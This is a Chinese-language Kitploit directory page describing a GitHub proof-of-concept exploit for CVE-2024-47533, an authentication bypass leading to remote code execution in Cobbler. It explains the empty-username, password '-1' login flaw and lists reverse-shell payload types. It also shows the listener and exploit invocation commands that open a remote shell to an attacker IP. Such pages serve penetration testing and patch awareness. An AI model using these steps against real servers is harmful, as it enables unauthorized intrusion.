Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC — CVE-2024-47533 是 Cobbler(版本 3.0.0 到 3.2.3 之前以及 3.3.7)中的一个严重身份验证绕过漏洞,允许未经身份验证的远程代码执行通过 XMLRPC 接口。 | Kitploit
工具/GitHubGitHub/dollarboysushil/cve-2024-47533-cobbler-xmlrpc-authentication-bypass-rce-exploit-poc
身份验证与授权Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队远程访问工具

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubdollarboysushil/cve-2024-47533-cobbler-xmlrpc-authentication-bypass-rce-exploit-poc

CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC

CVE-2024-47533 是 Cobbler(版本 3.0.0 到 3.2.3 之前以及 3.3.7)中的一个严重身份验证绕过漏洞,允许未经身份验证的远程代码执行通过 XMLRPC 接口。

查看仓库网站
8131年前尚未审核

CVE-2024-47533 - Cobbler XMLRPC 认证绕过 RCE 漏洞利用

⚠️ 通过认证绕过实现的 Cobbler 高危远程代码执行
🛠️ PoC 实现由 @dollarboysushil 提供


💡 概述

Cobbler 是一款 Linux 安装服务器,可快速搭建网络安装环境。在 3.0.0 至 3.2.3(不含)及 3.3.7(不含)版本中,存在一个认证漏洞。函数 utils.get_shared_secret() 始终返回 -1,允许任何人使用空用户名 ('') 和密码 -1 连接到 Cobbler XML-RPC 接口。这使得具有网络访问权限的攻击者能够完全控制 Cobbler 服务器。该漏洞已在 3.2.3 和 3.3.7 版本中修复。


🛠 技术解析

该漏洞由 utils.get_shared_secret() 函数对共享密钥的不当处理引起,该函数始终返回 -1,从而有效绕过了认证。这允许任何网络用户通过空凭据连接到 Cobbler 的 XMLRPC 接口并执行任意命令。


🔥 易受攻击的端点

http://<target>:25151/ — Cobbler 的 XMLRPC API 端点


💥 示例载荷

该漏洞利用脚本支持多种反弹 Shell 载荷,包括:

  • Bash 反弹 Shell
  • Netcat Shell(nc、nc2)
  • Python 反弹 Shell
  • Curl 下载并执行

🔬 概念验证 (PoC) 演示

📡 准备监听器

在您的机器上启动 Netcat 监听器:

root@kitploit:~
nc -lvnp 4444

netcat 监听器

🚀 运行漏洞利用

执行漏洞利用脚本 CVE-2024-47533-dbs.py。

root@kitploit:~
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

CVE-2024-47533-dbs.py

💻 成功获取远程 Shell

成功执行后,反弹 Shell 将回连至监听器,从而授予攻击者对服务器的远程访问权限。

成功反弹 Shell

📝 参考链接

  • SUSE Security Advisory for CVE-2024-47533
  • GitHub Security Advisory GHSA-m26c-fcgh-cp6h
  • Snyk Vulnerability Database: SNYK-PYTHON-COBBLER-8384360
下载工具